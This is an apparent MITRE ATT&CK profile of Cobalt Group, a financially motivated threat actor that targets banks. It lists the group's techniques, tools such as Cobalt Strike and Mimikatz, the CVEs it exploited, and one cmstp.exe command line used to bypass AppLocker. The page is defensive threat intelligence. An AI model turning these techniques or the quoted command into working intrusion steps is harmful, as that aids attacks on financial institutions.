Skip to content

G0080 Cobalt Group

Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.111097856 Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak.3

Item Value
ID G0080
Associated Names GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
Version 2.1
Created 17 October 2018
Last Modified 22 March 2023
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
GOLD KINGSWOOD 2
Cobalt Gang 11 14
Cobalt Spider 1

Techniques Used

Domain ID Name Use
enterprise T1548 Abuse Elevation Control Mechanism -
enterprise T1548.002 Bypass User Account Control Cobalt Group has bypassed UAC.7
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols Cobalt Group has used HTTPS for C2.1197
enterprise T1071.004 DNS Cobalt Group has used DNS tunneling for C2.1197
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.7
enterprise T1037 Boot or Logon Initialization Scripts -
enterprise T1037.001 Logon Script (Windows) Cobalt Group has added persistence by registering the file name for the next stage malware under HKCU\Environment\UserInitMprLogonScript.4
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Cobalt Group has used powershell.exe to download and execute scripts.111097612
enterprise T1059.003 Windows Command Shell Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.4 The group has used an exploit toolkit known as Threadkit that launches .bat files.1110741312
enterprise T1059.005 Visual Basic Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.1110741312
enterprise T1059.007 JavaScript Cobalt Group has executed JavaScript scriptlets on the victim’s machine.1110741312
enterprise T1543 Create or Modify System Process -
enterprise T1543.003 Windows Service Cobalt Group has created new services to establish persistence.7
enterprise T1573 Encrypted Channel -
enterprise T1573.002 Asymmetric Cryptography Cobalt Group has used the Plink utility to create SSH tunnels.7
enterprise T1203 Exploitation for Client Execution Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.11109856112
enterprise T1068 Exploitation for Privilege Escalation Cobalt Group has used exploits to increase their levels of rights and privileges.7
enterprise T1070 Indicator Removal -
enterprise T1070.004 File Deletion Cobalt Group deleted the DLL dropper from the victim’s machine to cover their tracks.11
enterprise T1105 Ingress Tool Transfer Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.109 The group’s JavaScript backdoor is also capable of downloading files.4
enterprise T1559 Inter-Process Communication -
enterprise T1559.002 Dynamic Data Exchange Cobalt Group has sent malicious Word OLE compound documents to victims.11
enterprise T1046 Network Service Discovery Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.1097
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.010 Command Obfuscation Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.114
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.9
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.111097851312
enterprise T1566.002 Spearphishing Link Cobalt Group has sent emails with URLs pointing to malicious documents.112
enterprise T1055 Process Injection Cobalt Group has injected code into trusted processes.7
enterprise T1572 Protocol Tunneling Cobalt Group has used the Plink utility to create SSH tunnels.1197
enterprise T1219 Remote Access Software Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.1097
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.7
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Cobalt Group has created Windows tasks to establish persistence.7
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim’s machine.4
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain Cobalt Group has compromised legitimate web browser updates to deliver a backdoor. 14
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.003 CMSTP Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.11413
enterprise T1218.008 Odbcconf Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.12
enterprise T1218.010 Regsvr32 Cobalt Group has used regsvr32.exe to execute scripts.11412
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.11132
enterprise T1204.002 Malicious File Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.1113
enterprise T1220 XSL Script Processing Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.11

Software

ID Name References Techniques
S0154 Cobalt Strike 111078 56112 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Parent PID Spoofing:Access Token Manipulation Domain Account:Account Discovery Web Protocols:Application Layer Protocol DNS:Application Layer Protocol Application Layer Protocol BITS Jobs Browser Session Hijacking Visual Basic:Command and Scripting Interpreter Python:Command and Scripting Interpreter JavaScript:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery Process Discovery Process Hollowing:Process Injection Process Injection Dynamic-link Library Injection:Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services SSH:Remote Services Remote Desktop Protocol:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S0002 Mimikatz 1097 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores LSASS Memory:OS Credential Dumping DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Ticket:Use Alternate Authentication Material Pass the Hash:Use Alternate Authentication Material
S0284 More_eggs 1114 Web Protocols:Application Layer Protocol Windows Command Shell:Command and Scripting Interpreter Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel File Deletion:Indicator Removal Ingress Tool Transfer Obfuscated Files or Information Security Software Discovery:Software Discovery Code Signing:Subvert Trust Controls Regsvr32:System Binary Proxy Execution System Information Discovery Internet Connection Discovery:System Network Configuration Discovery System Network Configuration Discovery System Owner/User Discovery
S0029 PsExec 107 Domain Account:Create Account Windows Service:Create or Modify System Process Lateral Tool Transfer SMB/Windows Admin Shares:Remote Services Service Execution:System Services
S0195 SDelete 9 Data Destruction File Deletion:Indicator Removal
S0646 SpicyOmelette 2 JavaScript:Command and Scripting Interpreter Data from Local System Ingress Tool Transfer Spearphishing Link:Phishing Remote System Discovery Software Discovery Security Software Discovery:Software Discovery Code Signing:Subvert Trust Controls System Information Discovery System Network Configuration Discovery Malicious Link:User Execution

References

  1. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. 

  2. CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021. 

  3. Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018. 

  4. Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018. 

  5. Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018. 

  6. Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018. 

  7. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. 

  8. Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018. 

  9. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. 

  10. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018. 

  11. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. 

  12. Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019. 

  13. Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018. 

  14. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.